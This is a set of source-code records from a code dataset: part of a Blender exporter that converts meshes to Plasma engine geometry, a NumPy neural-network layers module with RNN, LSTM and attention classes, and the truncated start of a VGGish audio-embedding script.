Thus, we temporarily apply modifiers to ALL meshes (even ones that\n # are not exported) such that we can generate proper lighting.\n mesh_type = bpy.types.Mesh\n for i in scene.objects:\n if isinstance(i.data, mesh_type) and i.is_modified(scene, \"RENDER\"):\n # Remember, storing actual pointers to the Blender objects can cause bad things to\n # happen because Blender's memory management SUCKS!\n self._overrides[i.name] = { \"mesh\": i.data.name, \"modifiers\": [] }\n i.data = i.to_mesh(scene, True, \"RENDER\", calc_tessface=False)\n\n # If the modifiers are left on the object, the lightmap bake can break under some\n # situations. Therefore, we now cache the modifiers and clear them away...\n if i.plasma_object.enabled:\n cache_mods = self._overrides[i.name][\"modifiers\"]\n for mod in i.modifiers:\n cache_mods.append(self._build_prop_dict(mod))\n i.modifiers.clear()\n self._report.progress_increment()\n return self\n\n def __exit__(self, type, value, traceback):\n data_bos, data_meshes = bpy.data.objects, bpy.data.meshes\n for obj_name, override in self._overrides.items():\n bo = data_bos.get(obj_name)\n\n # Reapply the old mesh\n trash_mesh, bo.data = bo.data, data_meshes.get(override[\"mesh\"])\n data_meshes.remove(trash_mesh)\n\n # If modifiers were removed, reapply them now.\n for cached_mod in override[\"modifiers\"]:\n mod = bo.modifiers.new(cached_mod[\"name\"], cached_mod[\"type\"])\n for key, value in cached_mod.items():\n if key in {\"name\", \"type\"}:\n continue\n setattr(mod, key, value)\n\n\nclass MeshConverter(_MeshManager):\n def __init__(self, exporter):\n self._exporter = weakref.ref(exporter)\n self.material = material.MaterialConverter(exporter)\n\n self._dspans = {}\n self._mesh_geospans = {}\n\n # _report is a property on this subclass\n super().__init__()\n\n def _calc_num_uvchans(self, bo, mesh):\n max_user_texs = plGeometrySpan.kUVCountMask\n num_user_texs = len(mesh.tessface_uv_textures)\n total_texs = num_user_texs\n\n # Bump Mapping requires 2 magic channels\n if self.material.get_bump_layer(bo) is not None:\n total_texs += 2\n max_user_texs -= 2\n\n # Lightmapping requires its own LIGHTMAPGEN channel\n # NOTE: the LIGHTMAPGEN texture has already been created, so it is in num_user_texs\n lm = bo.plasma_modifiers.lightmap\n if lm.enabled and lm.bake_type == \"lightmap\":\n num_user_texs -= 1\n max_user_texs -= 1\n\n return (num_user_texs, total_texs, max_user_texs)\n\n def _create_geospan(self, bo, mesh, bm, hsgmatKey):\n \"\"\"Initializes a plGeometrySpan from a Blender Object and an hsGMaterial\"\"\"\n geospan = plGeometrySpan()\n geospan.material = hsgmatKey\n\n # GeometrySpan format\n # For now, we really only care about the number of UVW Channels\n user_uvws, total_uvws, max_user_uvws = self._calc_num_uvchans(bo, mesh)\n if total_uvws > plGeometrySpan.kUVCountMask:\n raise explosions.TooManyUVChannelsError(bo, bm, user_uvws, max_user_uvws)\n geospan.format = total_uvws\n\n # Begin total guesswork WRT flags\n mods = bo.plasma_modifiers\n if mods.lightmap.enabled:\n geospan.props |= plGeometrySpan.kLiteVtxNonPreshaded\n if mods.lighting.rt_lights:\n geospan.props |= plGeometrySpan.kPropRunTimeLight\n\n # Harvest lights\n permaLights, permaProjs = self._exporter().light.find_material_light_keys(bo, bm)\n for i in permaLights:\n geospan.addPermaLight(i)\n for i in permaProjs:\n geospan.addPermaProj(i)\n\n # If this object has a CI, we don't need xforms here...\n if self._exporter().has_coordiface(bo):\n geospan.localToWorld = hsMatrix44()\n 
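# identity transforms here; the object's coordinate interface carries\n # the real local-to-world matrices at runtime.\n 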
geospan.worldToLocal = hsMatrix44()\n else:\n geospan.localToWorld = utils.matrix44(bo.matrix_basis)\n geospan.worldToLocal = geospan.localToWorld.inverse()\n return geospan\n\n def finalize(self):\n \"\"\"Prepares all baked Plasma geometry to be flushed to the disk\"\"\"\n self._report.progress_advance()\n self._report.progress_range = len(self._dspans)\n inc_progress = self._report.progress_increment\n log_msg = self._report.msg\n\n log_msg(\"\\nFinalizing Geometry\")\n for loc in self._dspans.values():\n for dspan in loc.values():\n log_msg(\"[DrawableSpans '{}']\", dspan.key.name, indent=1)\n\n # This mega-function does a lot:\n # 1. Converts SourceSpans (geospans) to Icicles and bakes geometry into plGBuffers\n # 2. Calculates the Icicle bounds\n # 3. Builds the plSpaceTree\n # 4. Clears the SourceSpans\n dspan.composeGeometry(True, True)\n inc_progress()\n\n def _export_geometry(self, bo, mesh, materials, geospans):\n geodata = [_GeoData(len(mesh.vertices)) for i in materials]\n bumpmap = self.material.get_bump_layer(bo)\n\n # Locate relevant vertex color layers now...\n lm = bo.plasma_modifiers.lightmap\n color, alpha = None, None\n for vcol_layer in mesh.tessface_vertex_colors:\n name = vcol_layer.name.lower()\n if name in _VERTEX_COLOR_LAYERS:\n color = vcol_layer.data\n elif name == \"autocolor\" and color is None and not lm.bake_lightmap:\n color = vcol_layer.data\n elif name == \"alpha\":\n alpha = vcol_layer.data\n\n # Convert Blender faces into things we can stuff into libHSPlasma\n for i, tessface in enumerate(mesh.tessfaces):\n data = geodata[tessface.material_index]\n face_verts = []\n use_smooth = tessface.use_smooth\n dPosDu = hsVector3(0.0, 0.0, 0.0)\n dPosDv = hsVector3(0.0, 0.0, 0.0)\n\n # Unpack the UV coordinates from each UV Texture layer\n # NOTE: Blender has no third (W) coordinate\n tessface_uvws = [uvtex.data[i].uv for uvtex in mesh.tessface_uv_textures]\n\n # Unpack colors\n if color is None:\n tessface_colors = ((1.0, 1.0, 1.0), (1.0, 1.0, 1.0), (1.0, 1.0, 1.0), (1.0, 1.0, 1.0))\n else:\n src = color[i]\n tessface_colors = (src.color1, src.color2, src.color3, src.color4)\n\n # Unpack alpha values\n if alpha is None:\n tessface_alphas = (1.0, 1.0, 1.0, 1.0)\n else:\n src = alpha[i]\n # average color becomes the alpha value\n tessface_alphas = (((src.color1[0] + src.color1[1] + src.color1[2]) / 3),\n ((src.color2[0] + src.color2[1] + src.color2[2]) / 3),\n ((src.color3[0] + src.color3[1] + src.color3[2]) / 3),\n ((src.color4[0] + src.color4[1] + src.color4[2]) / 3))\n\n if bumpmap is not None:\n gradPass = []\n gradUVWs = []\n\n if len(tessface.vertices) != 3:\n gradPass.append([tessface.vertices[0], tessface.vertices[1], tessface.vertices[2]])\n gradPass.append([tessface.vertices[0], tessface.vertices[2], tessface.vertices[3]])\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[1] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws))))\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws)),\n tuple((uvw[3] for uvw in tessface_uvws))))\n else:\n gradPass.append(tessface.vertices)\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[1] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws))))\n\n for p, vids in enumerate(gradPass):\n dPosDu += self._get_bump_gradient(bumpmap[1], gradUVWs[p], mesh, vids, bumpmap[0], 0)\n dPosDv += self._get_bump_gradient(bumpmap[1], gradUVWs[p], mesh, vids, bumpmap[0], 1)\n dPosDv = -dPosDv\n\n # Convert to 
per-material indices\n for j, vertex in enumerate(tessface.vertices):\n uvws = tuple([uvw[j] for uvw in tessface_uvws])\n\n # Grab VCols\n vertex_color = (int(tessface_colors[j][0] * 255), int(tessface_colors[j][1] * 255),\n int(tessface_colors[j][2] * 255), int(tessface_alphas[j] * 255))\n\n # Now, we'll index into the vertex dict using the per-face elements :(\n # We're using tuples because lists are not hashable. The many mathutils and PyHSPlasma\n # types are not either, and it's entirely too much work to fool with all that.\n coluv = (vertex_color, uvws)\n if coluv not in data.blender2gs[vertex]:\n source = mesh.vertices[vertex]\n geoVertex = plGeometrySpan.TempVertex()\n geoVertex.position = hsVector3(*source.co)\n\n # If this face has smoothing, use the vertex normal\n # Otherwise, use the face normal\n if use_smooth:\n geoVertex.normal = hsVector3(*source.normal)\n else:\n geoVertex.normal = hsVector3(*tessface.normal)\n\n geoVertex.color = hsColor32(*vertex_color)\n uvs = [hsVector3(uv[0], 1.0 - uv[1], 0.0) for uv in uvws]\n if bumpmap is not None:\n uvs.append(dPosDu)\n uvs.append(dPosDv)\n geoVertex.uvs = uvs\n\n idx = len(data.vertices)\n data.blender2gs[vertex][coluv] = idx\n data.vertices.append(geoVertex)\n face_verts.append(idx)\n else:\n # If we have a bump mapping layer, then we need to add the bump gradients for\n # this face to the vertex's magic channels\n if bumpmap is not None:\n num_user_uvs = len(uvws)\n geoVertex = data.vertices[data.blender2gs[vertex][coluv]]\n\n # Unfortunately, PyHSPlasma returns a copy of everything. Previously, editing\n # in place would result in silent failures; however, as of python_refactor,\n # PyHSPlasma now returns tuples to indicate this.\n geoUVs = list(geoVertex.uvs)\n geoUVs[num_user_uvs] += dPosDu\n geoUVs[num_user_uvs+1] += dPosDv\n geoVertex.uvs = geoUVs\n face_verts.append(data.blender2gs[vertex][coluv])\n\n # Convert to triangles, if need be...\n if len(face_verts) == 3:\n data.triangles += face_verts\n elif len(face_verts) == 4:\n data.triangles += (face_verts[0], face_verts[1], face_verts[2])\n data.triangles += (face_verts[0], face_verts[2], face_verts[3])\n\n # Time to finish it up...\n for i, data in enumerate(geodata):\n geospan = geospans[i][0]\n numVerts = len(data.vertices)\n numUVs = geospan.format & plGeometrySpan.kUVCountMask\n\n # There is a soft limit of 0x8000 vertices per span in Plasma, but the limit is\n # theoretically 0xFFFF because this field is a 16-bit integer. However, bad things\n # happen in MOUL when we have over 0x8000 vertices. 
I've also received tons of reports\n # of stack dumps in PotS when modifiers are applied, so we're going to limit to 0x8000.\n # TODO: consider busting up the mesh into multiple geospans?\n # or hack plDrawableSpans::composeGeometry to do it for us?\n if numVerts > _WARN_VERTS_PER_SPAN:\n raise explosions.TooManyVerticesError(bo.data.name, geospan.material.name, numVerts)\n\n # If we're bump mapping, we need to normalize our magic UVW channels\n if bumpmap is not None:\n for vtx in data.vertices:\n uvMap = vtx.uvs\n uvMap[numUVs - 2].normalize()\n uvMap[numUVs - 1].normalize()\n vtx.uvs = uvMap\n\n # If we're still here, let's add our data to the GeometrySpan\n geospan.indices = data.triangles\n geospan.vertices = data.vertices\n\n\n def _get_bump_gradient(self, xform, uvws, mesh, vIds, uvIdx, iUV):\n v0 = hsVector3(*mesh.vertices[vIds[0]].co)\n v1 = hsVector3(*mesh.vertices[vIds[1]].co)\n v2 = hsVector3(*mesh.vertices[vIds[2]].co)\n\n uv0 = (uvws[0][uvIdx][0], uvws[0][uvIdx][1], 0.0)\n uv1 = (uvws[1][uvIdx][0], uvws[1][uvIdx][1], 0.0)\n uv2 = (uvws[2][uvIdx][0], uvws[2][uvIdx][1], 0.0)\n\n notUV = int(not iUV)\n _REAL_SMALL = 0.000001\n\n delta = uv0[notUV] - uv1[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v1 - v0 if uv0[iUV] - uv1[iUV] < 0 else v0 - v1\n\n delta = uv2[notUV] - uv1[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v1 - v2 if uv2[iUV] - uv1[iUV] < 0 else v2 - v1\n\n delta = uv2[notUV] - uv0[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v0 - v2 if uv2[iUV] - uv0[iUV] < 0 else v2 - v0\n\n # On to the real fun...\n delta = uv0[notUV] - uv1[notUV]\n delta = 1.0 / delta\n v0Mv1 = v0 - v1\n v0Mv1 *= delta\n v0uv = (uv0[iUV] - uv1[iUV]) * delta\n\n delta = uv2[notUV] - uv1[notUV]\n delta = 1.0 / delta\n v2Mv1 = v2 - v1\n v2Mv1 *= delta\n v2uv = (uv2[iUV] - uv1[iUV]) * delta\n\n return v0Mv1 - v2Mv1 if v0uv > v2uv else v2Mv1 - v0Mv1\n\n def export_object(self, bo):\n # If this object has modifiers, then it's a unique mesh, and we don't need to try caching it\n # Otherwise, let's *try* to share meshes as best we can...\n if bo.modifiers:\n drawables = self._export_mesh(bo)\n else:\n drawables = self._mesh_geospans.get(bo.data, None)\n if drawables is None:\n drawables = self._export_mesh(bo)\n\n # Create the DrawInterface\n if drawables:\n diface = self._mgr.find_create_object(plDrawInterface, bl=bo)\n for dspan_key, idx in drawables:\n diface.addDrawable(dspan_key, idx)\n\n def _export_mesh(self, bo):\n # Previously, this called bo.to_mesh to apply modifiers. However, due to limitations in the\n # lightmap generation, this is now done for all modified mesh objects before any Plasma data\n # is exported.\n mesh = bo.data\n mesh.calc_tessface()\n\n # Step 0.8: Figure out which materials are attached to this object. Because Blender is backwards,\n # we can actually have materials that are None. 
gotdawgit!!!\n materials = [i for i in mesh.materials if i is not None]\n if not materials:\n return None\n\n # Step 1: Export all of the doggone materials.\n geospans = self._export_material_spans(bo, mesh, materials)\n\n # Step 2: Export Blender mesh data to Plasma GeometrySpans\n self._export_geometry(bo, mesh, materials, geospans)\n\n # Step 3: Add plGeometrySpans to the appropriate DSpan and create indices\n _diindices = {}\n for geospan, pass_index in geospans:\n dspan = self._find_create_dspan(bo, geospan.material.object, pass_index)\n self._report.msg(\"Exported hsGMaterial '{}' geometry into '{}'\",\n geospan.material.name, dspan.key.name, indent=1)\n idx = dspan.addSourceSpan(geospan)\n diidx = _diindices.setdefault(dspan, [])\n diidx.append(idx)\n\n # Step 3.1: Harvest Span indices and create the DIIndices\n drawables = []\n for dspan, indices in _diindices.items():\n dii = plDISpanIndex()\n dii.indices = indices\n idx = dspan.addDIIndex(dii)\n drawables.append((dspan.key, idx))\n return drawables\n\n def _export_material_spans(self, bo, mesh, materials):\n \"\"\"Exports all Materials and creates plGeometrySpans\"\"\"\n waveset_mod = bo.plasma_modifiers.water_basic\n if waveset_mod.enabled:\n if len(materials) > 1:\n msg = \"'{}' is a WaveSet -- only one material is supported\".format(bo.name)\n self._exporter().report.warn(msg, indent=1)\n matKey = self.material.export_waveset_material(bo, materials[0])\n geospan = self._create_geospan(bo, mesh, materials[0], matKey)\n\n # FIXME: Can some of this be generalized?\n geospan.props |= (plGeometrySpan.kWaterHeight | plGeometrySpan.kLiteVtxNonPreshaded |\n plGeometrySpan.kPropReverseSort | plGeometrySpan.kPropNoShadow)\n geospan.waterHeight = bo.location[2]\n return [(geospan, 0)]\n else:\n geospans = [None] * len(materials)\n for i, blmat in enumerate(materials):\n matKey = self.material.export_material(bo, blmat)\n geospans[i] = (self._create_geospan(bo, mesh, blmat, matKey), blmat.pass_index)\n return geospans\n\n def _find_create_dspan(self, bo, hsgmat, pass_index):\n location = self._mgr.get_location(bo)\n if location not in self._dspans:\n self._dspans[location] = {}\n\n # This is where we figure out which DSpan this goes into. To vaguely summarize the rules...\n # BlendSpans: anything with an alpha blended layer\n # SortSpans: means we should sort the spans in this DSpan with all other span in this pass\n # SortFaces: means we should sort the faces in this span only\n # We're using pass index to do just what it was designed for. 
Cyan has a nicer \"depends on\"\n # draw component, but pass index is the Blender way, so that's what we're doing.\n crit = _DrawableCriteria(bo, hsgmat, pass_index)\n\n if crit not in self._dspans[location]:\n # AgeName_[District_]_Page_RenderLevel_Crit[Blend]Spans\n # Just because it's nice to be consistent\n node = self._mgr.get_scene_node(location=location)\n name = \"{}_{:08X}_{:X}{}\".format(node.name, crit.render_level.level, crit.criteria, crit.span_type)\n dspan = self._mgr.add_object(pl=plDrawableSpans, name=name, loc=location)\n\n criteria = crit.criteria\n dspan.criteria = criteria\n if criteria & plDrawable.kCritSortFaces:\n dspan.props |= plDrawable.kPropSortFaces\n if criteria & plDrawable.kCritSortSpans:\n dspan.props |= plDrawable.kPropSortSpans\n dspan.renderLevel = crit.render_level.level\n dspan.sceneNode = node # AddViaNotify\n\n self._dspans[location][crit] = dspan\n return dspan\n else:\n return self._dspans[location][crit]\n\n @property\n def _mgr(self):\n return self._exporter().mgr\n\n @property\n def _report(self):\n return self._exporter().report\n","sub_path":"All_In_One/addons/korman/exporter/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":24400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"498306796","text":"import numpy as np\n\nfrom src.functions import softmax, cross_entropy_error, sigmoid\nfrom src.utils import UnigramSampler\n\n\nclass Affine:\n def __init__(self, W, b):\n self.params = [W, b]\n self.grads = [np.zeros_like(W), np.zeros_like(b)]\n self.x = None\n\n def forward(self, x):\n W, b = self.params\n self.x = x\n return np.dot(x, W) + b\n\n def backward(self, dout):\n W, b = self.params\n dx = np.dot(dout, W.T)\n dW = np.dot(self.x.T, dout)\n db = np.sum(dout, axis=0)\n self.grads[0][...] = dW\n self.grads[1][...] 
= db\n return dx\n\n\nclass Softmax:\n def __init__(self):\n self.params = []\n self.grads = []\n self.out = None\n\n def forward(self, x):\n self.out = softmax(x)\n return self.out\n\n def backward(self, dout):\n dx = dout * self.out\n sumdx = np.sum(dx, axis=1, keepdims=True)\n dx -= self.out * sumdx\n return dx\n\n\nclass SoftmaxWithLoss:\n def __init__(self):\n self.params = []\n self.grads = []\n\n self.y = None\n self.t = None\n\n def forward(self, x, t):\n self.y = softmax(x)\n self.t = t.argmax(axis=1) if t.shape == self.y.shape else t\n\n return cross_entropy_error(self.y, self.t)\n\n def backward(self, dout):\n batch_size = self.t.shape[0]\n\n dx = self.y.copy()\n dx[np.arange(batch_size), self.t] -= 1\n dx *= dout\n dx /= batch_size\n return dx\n\n\nclass Sigmoid:\n def __init__(self):\n self.params = []\n self.grads = []\n self.out = None\n\n def forward(self, x):\n out = 1 / (1 + np.exp(-x))\n self.out = out\n return out\n\n def backward(self, dout):\n return dout * self.out * (1 - self.out)\n\n\nclass SigmoidWithLoss:\n def __init__(self):\n self.params = []\n self.grads = []\n self.y = None\n self.t = None\n\n def forward(self, x, t):\n self.y = sigmoid(x)\n self.t = t\n loss = cross_entropy_error(np.c_[1 - self.y, self.y], t)\n return loss\n\n def backward(self, dout=1):\n batch_size = self.t.shape[0]\n dx = (self.y - self.t) * dout / batch_size\n return dx\n\n\nclass Matmul:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.x = None\n\n def forward(self, x):\n W, = self.params\n self.x = x\n return np.dot(x, W)\n\n def backward(self, dout):\n W, = self.params\n dx = np.dot(dout, W.T)\n dW = np.dot(self.x.T, dout)\n self.grads[0][...] = dW\n return dx\n\n\nclass Embedding:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.idx = None\n\n def forward(self, idx):\n W, = self.params\n self.idx = idx\n return W[idx]\n\n def backward(self, dout):\n dW, = self.grads\n dW[...] 
= 0\n np.add.at(dW, self.idx, dout)\n\n\nclass EmbeddingDot:\n def __init__(self, W):\n self.embed = Embedding(W)\n self.params = self.embed.params\n self.grads = self.embed.grads\n self.cache = None\n\n def forward(self, h, idx):\n target_W = self.embed.forward(idx)\n out = np.sum(target_W * h, axis=1)\n self.cache = (h, target_W)\n return out\n\n def backward(self, dout):\n h, target_W = self.cache\n dout = dout.reshape(dout.shape[0], 1)\n dtarget_W = dout * h\n self.embed.backward(dtarget_W)\n\n dh = dout * target_W\n return dh\n\n\nclass NegativeSamplingLoss:\n def __init__(self, W, corpus, power=0.75, sample_size=5):\n self.sample_size = sample_size\n self.sampler = UnigramSampler(corpus, power, sample_size)\n self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size+1)]\n self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size+1)]\n\n self.params = []\n self.grads = []\n for embed_dot_layer in self.embed_dot_layers:\n self.params += embed_dot_layer.params\n self.grads += embed_dot_layer.grads\n\n def forward(self, h, target):\n batch_size = target.shape[0]\n negative_targets = self.sampler.get_negative_sample(target)\n\n y = self.embed_dot_layers[0].forward(h, target)\n t = np.ones(batch_size, dtype=np.int32)\n loss = self.loss_layers[0].forward(y, t)\n\n t = np.zeros(batch_size, dtype=np.int32)\n for i in range(self.sample_size):\n negative_target = negative_targets[:, i]\n y = self.embed_dot_layers[i + 1].forward(h, negative_target)\n loss += self.loss_layers[i + 1].forward(y, t)\n\n return loss\n\n def backward(self, dout):\n dh = 0\n for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):\n dy = l0.backward(dout)\n dh += l1.backward(dy)\n return dh\n\n\nclass RNN:\n def __init__(self, Wx, Wh, b):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.cache = None\n\n def forward(self, x, h_prev):\n Wx, Wh, b = self.params\n t = np.dot(x, Wx) + np.dot(h_prev, Wh) + b\n h_next = np.tanh(t)\n self.cache = (x, h_prev, h_next)\n return h_next\n\n def backward(self, dh_next):\n Wx, Wh, b = self.params\n x, h_prev, h_next = self.cache\n\n dh = dh_next * (1 - h_next ** 2)\n dh_prev = np.dot(dh, Wh.T)\n dWh = np.dot(h_prev.T, dh)\n dx = np.dot(dh, Wx.T)\n dWx = np.dot(x.T, dh)\n db = np.sum(dh, axis=0)\n\n self.grads[0][...] = dWx\n self.grads[1][...] = dWh\n self.grads[2][...] = db\n return dx, dh_prev\n\n\nclass TimeRNN:\n def __init__(self, Wx, Wh, b, stateful):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.layers = None\n\n self.stateful = stateful\n self.h = None\n self.dh = None\n\n def set_state(self, h):\n self.h = h\n\n def reset_state(self):\n self.h = None\n\n def forward(self, xs):\n Wx, Wh, b = self.params\n N, T, D = xs.shape\n D, H = Wx.shape\n\n self.layers = []\n hs = np.empty((N, T, H), dtype='f')\n if not self.stateful or self.h is None:\n self.h = np.zeros((N, H), dtype='f')\n\n for t in range(T):\n layer = RNN(*self.params)\n self.h = layer.forward(xs[:, t, :], self.h)\n hs[:, t, :] = self.h\n self.layers.append(layer)\n\n return hs\n\n def backward(self, dhs):\n Wx, Wh, b = self.params\n N, T, H = dhs.shape\n D, H = Wx.shape\n\n dh = 0\n grads = [0, 0, 0]\n\n dxs = np.empty((N, T, D), dtype='f')\n\n for t in reversed(range(T)):\n layer = self.layers[t]\n dx, dh = layer.backward(dhs[:, t, :] + dh)\n dxs[:, t, :] = dx\n\n for i, grad in enumerate(layer.grads):\n grads[i] += grad\n\n for i, grad in enumerate(grads):\n self.grads[i][...] 
= grad\n self.dh = dh\n return dxs\n\n\nclass TimeEmbedding:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.layers = None\n\n def forward(self, xs):\n W, = self.params\n N, T = xs.shape\n V, D = W.shape\n\n self.layers = []\n hs = np.empty((N, T, D), dtype='f')\n for t in range(T):\n layer = Embedding(W)\n h = layer.forward(xs[:, t])\n hs[:, t, :] = h\n self.layers.append(layer)\n\n return hs\n\n def backward(self, dout):\n N, T, D = dout.shape\n\n grad = 0\n for t in range(T):\n layer = self.layers[t]\n layer.backward(dout[:, t, :])\n grad += layer.grads[0]\n\n self.grads[0][...] = grad\n\n\nclass TimeAffine:\n def __init__(self, W, b):\n self.params = [W, b]\n self.grads = [np.zeros_like(W), np.zeros_like(b)]\n self.layers = None\n\n def forward(self, x):\n W, b = self.params\n N, T, D = x.shape\n\n rx = x.reshape(N * T, -1)\n out = np.dot(rx, W) + b\n self.x = x\n return out.reshape(N, T, -1)\n\n def backward(self, dout):\n W, b = self.params\n N, T, D = dout.shape\n x = self.x\n\n dout = dout.reshape(N * T, -1)\n rx = x.reshape(N * T, -1)\n\n db = np.sum(dout, axis=0)\n dW = np.dot(rx.T, dout)\n dx = np.dot(dout, W.T)\n dx = dx.reshape(*x.shape)\n\n self.grads[0][...] = dW\n self.grads[1][...] = db\n return dx\n\n\nclass TimeSoftmaxWithLoss:\n def __init__(self):\n self.params = []\n self.grads = []\n\n self.cache = None\n self.ignore_label = -1\n\n def forward(self, xs, ts):\n N, T, V = xs.shape\n\n if ts.ndim == 3:\n ts = ts.argmax(axis=2)\n mask = (ts != self.ignore_label)\n\n xs = xs.reshape(N * T, V)\n ts = ts.reshape(N * T)\n mask = mask.reshape(N * T)\n\n ys = softmax(xs)\n ls = np.log(ys[np.arange(N * T), ts])\n ls *= mask\n loss = -np.sum(ls)\n loss /= mask.sum()\n\n self.cache = (ts, ys, mask, (N, T, V))\n return loss\n\n def backward(self, dout=1):\n ts, ys, mask, (N, T, V) = self.cache\n\n dx = ys\n dx[np.arange(N * T), ts] -= 1\n dx *= dout\n dx /= mask.sum()\n dx *= mask[:, np.newaxis]\n dx = dx.reshape((N, T, V))\n return dx\n\n\nclass SimpleRNNLM:\n def __init__(self, vocab_size, word_vecs, hidden_size):\n V, D, H = vocab_size, word_vecs, hidden_size\n\n embed_W = (np.random.randn(V, D) / 100).astype('f')\n rnn_Wx = (np.random.randn(D, H) / np.sqrt(D)).astype('f')\n rnn_Wh = (np.random.randn(H, H) / np.sqrt(H)).astype('f')\n rnn_b = np.zeros(H).astype('f')\n\n affine_W = (np.random.randn(H, V) / np.sqrt(H)).astype('f')\n affine_b = np.zeros(V).astype('f')\n\n self.layers = [\n TimeEmbedding(embed_W),\n TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),\n TimeAffine(affine_W, affine_b)\n ]\n\n self.loss_layer = TimeSoftmaxWithLoss()\n self.rnn_layer = self.layers[1]\n\n self.params = []\n self.grads = []\n for layer in self.layers:\n self.params += layer.params\n self.grads += layer.grads\n\n def forward(self, xs, ts):\n for layer in self.layers:\n xs = layer.forward(xs)\n loss = self.loss_layer.forward(xs, ts)\n return loss\n\n def backward(self, dout=1):\n dout = self.loss_layer.backward(dout)\n for layer in reversed(self.layers):\n dout = layer.backward(dout)\n return dout\n\n def reset_state(self):\n self.rnn_layer.reset_state()\n\n\nclass LSTM:\n def __init__(self, Wx, Wh, b):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.cache = None\n\n def forward(self, x, h_prev, c_prev):\n Wx, Wh, b = self.params\n N, H = h_prev.shape\n\n A = np.dot(x, Wx) + np.dot(h_prev, Wh) + b\n\n f = sigmoid(A[:, 0*H:1*H])\n g = np.tanh(A[:, 1*H:2*H])\n i = sigmoid(A[:, 2*H:3*H])\n o = 
sigmoid(A[:, 3*H:4*H])\n\n c_next = c_prev * f + i * g\n h_next = np.tanh(c_next) * o\n\n self.cache = (x, h_prev, c_prev, i, f, g, o, c_next)\n\n return h_next, c_next\n\n def backward(self, dh_next, dc_next):\n Wx, Wh, b = self.params\n x, h_prev, c_prev, i, f, g, o, c_next = self.cache\n\n tanh_c_next = np.tanh(c_next)\n ds = (dh_next * o) * (1 - tanh_c_next ** 2) + dc_next\n\n dc_prev = ds * f\n\n di = ds * g\n df = ds * c_prev\n do = dh_next * tanh_c_next\n dg = ds * i\n\n di *= i * (1 - i)\n df *= f * (1 - f)\n do *= o * (1 - o)\n dg *= (1 - g ** 2)\n\n dA = np.hstack((df, dg, di, do))\n\n dWh = np.dot(h_prev.T, dA)\n dWx = np.dot(x.T, dA)\n db = dA.sum(axis=0)\n\n self.grads[0][...] = dWx\n self.grads[1][...] = dWh\n self.grads[2][...] = db\n\n dx = np.dot(dA, Wx.T)\n dh_prev = np.dot(dA, Wh.T)\n\n return dx, dh_prev, dc_prev\n\n\nclass WeighSum:\n def __init__(self):\n self.params = []\n self.grads = []\n self.cache = None\n\n def forward(self, hs, a):\n '''\n Args:\n hs(N, T, H)\n a(N, T)\n Returns:\n cs(N, H)\n '''\n\n N, T, H = hs.shape\n ar = a.reshape(N, T, 1).repeat(H, axis=2)\n t = hs * ar\n c = np.sum(t, axis=1)\n self.cache = (hs, ar)\n return c\n\n def backward(self, dc):\n '''\n Args:\n dc(N, H):\n Returns:\n dhs:\n da:\n '''\n hs, ar = self.cache\n N, T, H = hs.shape\n\n dt = dc.reshape(N, 1, H).repeat(T, axis=1)\n\n dar = dt * hs\n dhs = dt * ar\n\n da = np.sum(dar, axis=2)\n\n return dhs, da\n\n\nclass AttentionWeight:\n def __init__(self):\n self.params = []\n self.grads = []\n self.softmax = Softmax()\n self.cache = None\n\n def forward(self, hs, h):\n N, T, H = hs.shape\n hr = h.reshape(N, 1, H).repeat(T, axis=1)\n t = hs * hr\n s = np.sum(t, axis=2)\n a = self.softmax.forward(s)\n self.cache = (hs, hr)\n return a\n\n def backward(self, da):\n hs, hr = self.cache\n N, T, H = hs.shape\n\n ds = self.softmax.backward(da)\n dt = ds.reshape(N, T, 1).repeat(H, axis=2)\n\n dhr = dt * hs\n dhs = dt * hr\n\n dh = np.sum(dhr, axis=1)\n return dhs, dh\n\n\nclass Attention:\n def __init__(self):\n self.params = []\n self.grads = []\n self.attention_weight_layer = AttentionWeight()\n self.weight_sum_layer = WeighSum()\n self.attention_weight = None\n\n def forward(self, hs, h):\n a = self.attention_weight_layer.forward(hs, h)\n self.attention_weight = a\n c = self.weight_sum_layer.forward(hs, a)\n return c\n\n def backward(self, dc):\n dhs0, da = self.weight_sum_layer.backward(dc)\n dhs1, dh = self.attention_weight_layer.backward(da)\n dhs = dhs0 + dhs1\n return dhs, dh\n","sub_path":"src/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":14450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"373481195","text":"import csv\nimport os\nimport tensorflow as tf\nfrom tensorflow import app\nfrom tensorflow import flags\n\nimport numpy as np\nfrom scipy.io import wavfile\nimport six\n\nfrom pydub import AudioSegment\n\nimport vggish_input\nimport vggish_params\nimport vggish_postprocess\nimport vggish_slim\nfrom subprocess import call\n\nFLAGS = flags.FLAGS\n\nif __name__ == '__main__':\n flags.DEFINE_string('input_youtube_id_tsv', '/home/shakil/PSVA/data/output/eval/youtube_eval.txt',\n 'TSV file with lines \"\\t\\t\\t